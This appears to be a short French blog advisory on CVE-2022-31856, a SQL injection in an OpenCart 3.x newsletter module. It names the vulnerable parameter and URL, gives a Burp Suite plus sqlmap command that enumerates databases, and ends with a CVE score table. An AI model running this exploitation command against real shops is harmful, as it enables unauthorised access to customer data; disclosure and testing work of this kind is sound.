OpenCart faille CVE sur le module newsletter

Opencart a une nouvelle faille de type SQL INJECTION sur le module newsletter en version v3.x.

la cyberattaque se fait via le paramètre emez_newsletter_email accessible depuis l’url /index.php?route=extension/module/zemez_newsletter/addNewsletter

 

 

Procédure

Vous aurez besoin de burpsuite et sqlmap .

Avec Burpsuite rendez vous dur l url :

http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter

enregistrer la requête puis avec sqlmap :
 

				
					sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs
				
			
Information Valeur

CVE

CVE-2022-31856

CVE publié le

05/07/2022

Score

7.5

Fuite de données

Partielle

Intégrité Système

Partielle

Impact sur les ressources

Partielle

Compléxité

Facile

Authentification requise

Non